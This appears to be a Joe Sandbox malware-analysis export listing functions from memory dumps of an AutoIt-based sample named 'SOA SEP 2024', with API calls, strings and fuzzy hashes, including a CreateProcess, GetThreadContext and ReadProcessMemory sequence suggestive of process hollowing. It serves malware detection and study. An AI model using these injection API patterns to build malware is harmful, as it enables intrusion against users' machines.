Opcode ID: ae025300dff21bf1d8ba31f716b2655aa67fbdf273a3a3120efa93f09f5ae188
Instruction ID: 17df91936270d663dc3bbb6d0fea6fb80f81d55299126a8b2f46685ac0c61b83
Opcode Fuzzy Hash: ae025300dff21bf1d8ba31f716b2655aa67fbdf273a3a3120efa93f09f5ae188
Instruction Fuzzy Hash: EF4125F120028AABDF205F68ACCEFBA36A5F754341F584129FE03D6191CB6CAE51D761

Function 00763E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00763E79
LoadCursorW.USER32(00000000,00007F00), ref: 00763E88
LoadIconW.USER32(00000063), ref: 00763E9E
LoadIconW.USER32(000000A4), ref: 00763EB0
LoadIconW.USER32(000000A2), ref: 00763EC2

Part of subcall function 00764024: LoadImageW.USER32(00760000,00000063,00000001,00000010,00000010,00000000), ref: 00764048

RegisterClassExW.USER32(?), ref: 00763F30

Part of subcall function 00763F53: GetSysColorBrush.USER32(0000000F), ref: 00763F86
Part of subcall function 00763F53: RegisterClassExW.USER32(00000030), ref: 00763FB0
Part of subcall function 00763F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00763FC1
Part of subcall function 00763F53: InitCommonControlsEx.COMCTL32(?), ref: 00763FDE
Part of subcall function 00763F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00763FEE
Part of subcall function 00763F53: LoadIconW.USER32(000000A9), ref: 00764004
Part of subcall function 00763F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00764013

Strings

0, xrefs: 00763F02
AutoIt v3, xrefs: 00763F1F
#, xrefs: 00763F09

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: c2952b4caec47fe4b4fdbd467e49508d1b9d4804002ea3f156fc8b2f49b8c1c1
Instruction ID: 86f49b6a521f4331df8fd0ef419bdeb0d4227249a91419874f35d97b7026a94c
Opcode Fuzzy Hash: c2952b4caec47fe4b4fdbd467e49508d1b9d4804002ea3f156fc8b2f49b8c1c1
Instruction Fuzzy Hash: C1215EB0E00304ABDF20DFA9EC49A99BFF5FB58310F20812AE605A62A0D3754A51CF95

Function 00D685A0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00D68671
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00D68897

Memory Dump Source

Source File: 00000000.00000002.2102902206.0000000000D66000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D66000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d66000_SOA SEP 2024.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: 966174affad311d6204548a92a281b1da250bb1a2b19b4c878101ea01a330e63
Instruction ID: 99170ea50a0b69d7169876a26630fff32bd3885e9297483e5e9b9bb41a1c9e44
Opcode Fuzzy Hash: 966174affad311d6204548a92a281b1da250bb1a2b19b4c878101ea01a330e63
Instruction Fuzzy Hash: A1A11874E00209EBDB14CFA4C898BEEBBB5FF48705F248659E501BB280DB759A41DF64

Function 007649FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00764A1D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 007D41DB
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 007D421A
RegCloseKey.ADVAPI32(?), ref: 007D4249

Strings

Include, xrefs: 007D41D3, 007D4212
Software\AutoIt v3\AutoIt, xrefs: 00764A13

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID: Include$Software\AutoIt v3\AutoIt
API String ID: 1586453840-614718249
Opcode ID: b42e943977c84376c6182bb479b6579d8f97cfcca1cb5983c9be788f945005f2
Instruction ID: aef15b28e47b2fd46bc59797be705fba907daa4c10b8a0196ade09b38b69a5dc
Opcode Fuzzy Hash: b42e943977c84376c6182bb479b6579d8f97cfcca1cb5983c9be788f945005f2
Instruction Fuzzy Hash: 08116D71601108FFEB10EBA4CD8ADBF7BBCEF04344F004059B606E6191EA78AE01DB60

Function 007636B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 007636E6
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00763707
ShowWindow.USER32(00000000,?,?,?,?,00763AA3,?), ref: 0076371B
ShowWindow.USER32(00000000,?,?,?,?,00763AA3,?), ref: 00763724

Strings

AutoIt v3, xrefs: 007636DE, 007636E3, 007636E4
edit, xrefs: 00763701

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 87884727a8a6330be341b22d8ed27585676c685ca7b39c0345f539db1df3d71a
Instruction ID: 8324a8c8f06bbdb77ff50ef7c9d264012e6dbc655602c3b8e83306b590c6bd53
Opcode Fuzzy Hash: 87884727a8a6330be341b22d8ed27585676c685ca7b39c0345f539db1df3d71a
Instruction Fuzzy Hash: 9DF054706402D47ADB3057576C4CE773E7EE7D6F20F10802FBA04962B0C1650C82CA74

Function 00D68370 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 145
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00D68260: Sleep.KERNELBASE(000001F4), ref: 00D68271

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00D68497

Strings

07RJ5NDDLH2OT, xrefs: 00D684FA, 00D684FD

Memory Dump Source

Source File: 00000000.00000002.2102902206.0000000000D66000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D66000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d66000_SOA SEP 2024.jbxd

Similarity

API ID: CreateFileSleep
String ID: 07RJ5NDDLH2OT
API String ID: 2694422964-1113717179
Opcode ID: cdbb54ab6f3390f2d296d2ca74fe5a748d9a9bd28a525851f0b95636f29fa955
Instruction ID: 2d09ae1e5284df9244683e75d74bc74478db1b463ca87e052ebeb79a98f7bb8a
Opcode Fuzzy Hash: cdbb54ab6f3390f2d296d2ca74fe5a748d9a9bd28a525851f0b95636f29fa955
Instruction Fuzzy Hash: 08519270D54249EBEF10DBA4C855BEEB779AF18300F004599E209BB2C0DBB95B44DB75

Function 00764139 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 007641A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,007639FE,?,00000001), ref: 007641DB

_free.LIBCMT ref: 007D36B7
_free.LIBCMT ref: 007D36FE

Part of subcall function 0076C833: __wsplitpath.LIBCMT ref: 0076C93E
Part of subcall function 0076C833: _wcscpy.LIBCMT ref: 0076C953
Part of subcall function 0076C833: _wcscat.LIBCMT ref: 0076C968
Part of subcall function 0076C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0076C978

Strings

Bad directive syntax error, xrefs: 007D36E4
>>>AUTOIT SCRIPT<<<, xrefs: 007D3491

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 805182592-1757145024
Opcode ID: 93c5ff638548153074de57b658bef6df2ae8aa3be8d6967351bc5719aac6c56e
Instruction ID: 5963e90bb446c9c843d97385a3fcc4b4b09a59a27750f234f4b25896f025dee7
Opcode Fuzzy Hash: 93c5ff638548153074de57b658bef6df2ae8aa3be8d6967351bc5719aac6c56e
Instruction Fuzzy Hash: C7918E71910219EFCF04EFA4CC959EEB7B4BF19310F10442AF816AB391DB78AA55CB61

Function 00764A30 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00765374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00821148,?,007661FF,?,00000000,00000001,00000000), ref: 00765392

Part of subcall function 007649FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00764A1D

_wcscat.LIBCMT ref: 007D2D80
_wcscat.LIBCMT ref: 007D2DB5

Strings

\, xrefs: 007D2DA2
\Include\, xrefs: 00764B0A

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: _wcscat$FileModuleNameOpen
String ID: \$\Include\
API String ID: 3592542968-2640467822
Opcode ID: d07c9fe78552a92312dbad31a6e7f9b56b350cfd601eeeb94ac5f0a6e2b3d888
Instruction ID: 085b32871eb24c08fb90af4a1685a0c28a327e0f48c7d386bb8d3fa132c8cdf1
Opcode Fuzzy Hash: d07c9fe78552a92312dbad31a6e7f9b56b350cfd601eeeb94ac5f0a6e2b3d888
Instruction Fuzzy Hash: 0A519971504340EFC324EF59D885CAAB7F4FF59310B80852EFA45D3261EB78AA5ACB52

Function 007834AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

__getstream.LIBCMT ref: 007834FE

Part of subcall function 00787C0E: __getptd_noexit.LIBCMT ref: 00787C0E

@_EH4_CallFilterFunc@8.LIBCMT ref: 00783539
__wopenfile.LIBCMT ref: 00783549

Strings

<G, xrefs: 007834CD, 007834F0, 007834FC

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
String ID: <G
API String ID: 1820251861-2138716496
Opcode ID: 8b2ed24c96304795c771a8d44b8cca074ffeaeb63e35e7886ba1ec257f0f0220
Instruction ID: 90015d6dc0c012e4e9cc75341c20e4b2fde021a96093255927fcbc1cf8a32948
Opcode Fuzzy Hash: 8b2ed24c96304795c771a8d44b8cca074ffeaeb63e35e7886ba1ec257f0f0220
Instruction Fuzzy Hash: 36112C70A80206EFDB22BF788C4667E36A4BF05B60B148525F419C7281EB7CCB51D7B1

Function 0077D298 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0077D28B,SwapMouseButtons,00000004,?), ref: 0077D2BC
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,0077D28B,SwapMouseButtons,00000004,?,?,?,?,0077C865), ref: 0077D2DD
RegCloseKey.KERNELBASE(00000000,?,?,0077D28B,SwapMouseButtons,00000004,?,?,?,?,0077C865), ref: 0077D2FF

Strings

Control Panel\Mouse, xrefs: 0077D2BA

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 196f500f3efaa22bd9e294cc673677267ed0b5a6b8be5980bfb26a54b75b5a66
Instruction ID: 9220dd9729bc1a10775989d9afa1ad7b8af8b626c716353e5c58ae14f33ca7b8
Opcode Fuzzy Hash: 196f500f3efaa22bd9e294cc673677267ed0b5a6b8be5980bfb26a54b75b5a66
Instruction Fuzzy Hash: 61113975611208FFDF208FA8CC84EEF7BB8EF48794F108869E809D7110E635AE419B64

Function 00D67260 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 00D67A8D
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00D67AB1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00D67AD3

Memory Dump Source

Source File: 00000000.00000002.2102902206.0000000000D66000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D66000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d66000_SOA SEP 2024.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
Instruction ID: 4b0b910a2abb52ea751c3e98907666fd530def61b6dfab638a76d9d7ecabaa12
Opcode Fuzzy Hash: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
Instruction Fuzzy Hash: D9621E30A14258DBEB24CFA4C851BEEB376EF58304F1095A9D10DEB390E7759E81CB69

Function 0078365B Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 007836B7
_memcpy_s.LIBCMT ref: 00783729
__filbuf.LIBCMT ref: 007837AA
_memset.LIBCMT ref: 007837EE

Part of subcall function 00787C0E: __getptd_noexit.LIBCMT ref: 00787C0E

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit_memcpy_s
String ID:
API String ID: 3877424927-0
Opcode ID: 25276d1f646da7b76298e578b8e053e7e3b96e54df01e447abe6ae266d0f960a
Instruction ID: b6bc0277f0fe109f925c29368feb03dfdc387725662fd774a99722edec44a669
Opcode Fuzzy Hash: 25276d1f646da7b76298e578b8e053e7e3b96e54df01e447abe6ae266d0f960a
Instruction Fuzzy Hash: 0851A2B0B80205EBDB24BF6DC88466E77A5AF40B20F248729F835962D0E77DDF508B50

Function 007AC396 Relevance: 6.2, APIs: 4, Instructions: 154COMMON

Download Yara Rule

APIs

Part of subcall function 00764517: _fseek.LIBCMT ref: 0076452F

Part of subcall function 007AC56D: _wcscmp.LIBCMT ref: 007AC65D
Part of subcall function 007AC56D: _wcscmp.LIBCMT ref: 007AC670

_free.LIBCMT ref: 007AC4DD
_free.LIBCMT ref: 007AC4E4
_free.LIBCMT ref: 007AC54F

Part of subcall function 00781C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00787A85), ref: 00781CB1
Part of subcall function 00781C9D: GetLastError.KERNEL32(00000000,?,00787A85), ref: 00781CC3

_free.LIBCMT ref: 007AC557

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
Instruction ID: 24b18842aaffc19710918bd8fd8f08a2f6027c06f18ab5557676f424af30db45
Opcode Fuzzy Hash: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
Instruction Fuzzy Hash: B1516EB1904258EFDF159F68DC85BADBBB9EF48300F1000AEF619A3241DB755A908F59

Function 0077EB83 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0077EBB2

Part of subcall function 007651AF: _memset.LIBCMT ref: 0076522F
Part of subcall function 007651AF: _wcscpy.LIBCMT ref: 00765283
Part of subcall function 007651AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00765293

KillTimer.USER32(?,00000001,?,?), ref: 0077EC07
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0077EC16
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007D3C88

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 0c43ad41a6e4f7b4481386b79c48c9d4947b275b62e8f1965bdcfc93e2d079ff
Instruction ID: f0e0892af7d75ea50b4e1fd6f1bc5a4609ac30096f4cfd58252fb16c385bf20e
Opcode Fuzzy Hash: 0c43ad41a6e4f7b4481386b79c48c9d4947b275b62e8f1965bdcfc93e2d079ff
Instruction Fuzzy Hash: 0E21DE745047949FEB339B24CC59BE7BFFC9B15308F04449EE69E56281C3782A84CB62

Function 007640E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007D3725
GetOpenFileNameW.COMDLG32 ref: 007D376F

Part of subcall function 0076660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007653B1,?,?,007661FF,?,00000000,00000001,00000000), ref: 0076662F

Part of subcall function 007640A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007640C6

Strings

X, xrefs: 007D373E

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: 0e2d7f039312e4d675c9204d7480ff8a0024a320491c92932c924b0a3191a704
Instruction ID: 969d41913a83681d5b7f7c83483a21f666f0d0329608256baf009009ecdd066e
Opcode Fuzzy Hash: 0e2d7f039312e4d675c9204d7480ff8a0024a320491c92932c924b0a3191a704
Instruction Fuzzy Hash: 88219371A10298DBCB11EFD4D8497DEBBF8AF49304F10805AE905EB241DBB85A898F65

Function 007AC71A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 007AC72F
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 007AC746

Strings

aut, xrefs: 007AC740

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 8cf95b191e58504ad487cb86ff4829b2130d2765eac5c0ff8bdafcf036e9fcfd
Instruction ID: 0fc3b63d5b30e88534dca4100d245480707cf46ce96d71a8cad7ef2f0aa9065c
Opcode Fuzzy Hash: 8cf95b191e58504ad487cb86ff4829b2130d2765eac5c0ff8bdafcf036e9fcfd
Instruction Fuzzy Hash: BBD05E7150030EABDB20AB90DC4EFCA7B6CAB04704F0041A07750E91B1DAF8EA998B58

Function 007BF8AE Relevance: 4.9, APIs: 3, Instructions: 385COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d8455b71e572981cd43f362efe1e1f0576b7d1230b6535c94b29f83d6ec0dbe
Instruction ID: a1635bae2f50fbea377546b3c2d7ceca1f098bd38d9011937289449cf34e62de
Opcode Fuzzy Hash: 6d8455b71e572981cd43f362efe1e1f0576b7d1230b6535c94b29f83d6ec0dbe
Instruction Fuzzy Hash: 2FF15971604301DFCB10DF24C895BAAB7E5FF88714F14892EF9999B292D738E945CB82

Function 0078395C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00783973

Part of subcall function 007881C2: __NMSG_WRITE.LIBCMT ref: 007881E9
Part of subcall function 007881C2: __NMSG_WRITE.LIBCMT ref: 007881F3

__NMSG_WRITE.LIBCMT ref: 0078397A

Part of subcall function 0078821F: GetModuleFileNameW.KERNEL32(00000000,00820312,00000104,00000000,00000001,00000000), ref: 007882B1
Part of subcall function 0078821F: ___crtMessageBoxW.LIBCMT ref: 0078835F

Part of subcall function 00781145: ___crtCorExitProcess.LIBCMT ref: 0078114B
Part of subcall function 00781145: ExitProcess.KERNEL32 ref: 00781154

Part of subcall function 00787C0E: __getptd_noexit.LIBCMT ref: 00787C0E

RtlAllocateHeap.NTDLL(00D20000,00000000,00000001,00000001,00000000,?,?,0077F507,?,0000000E), ref: 0078399F

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
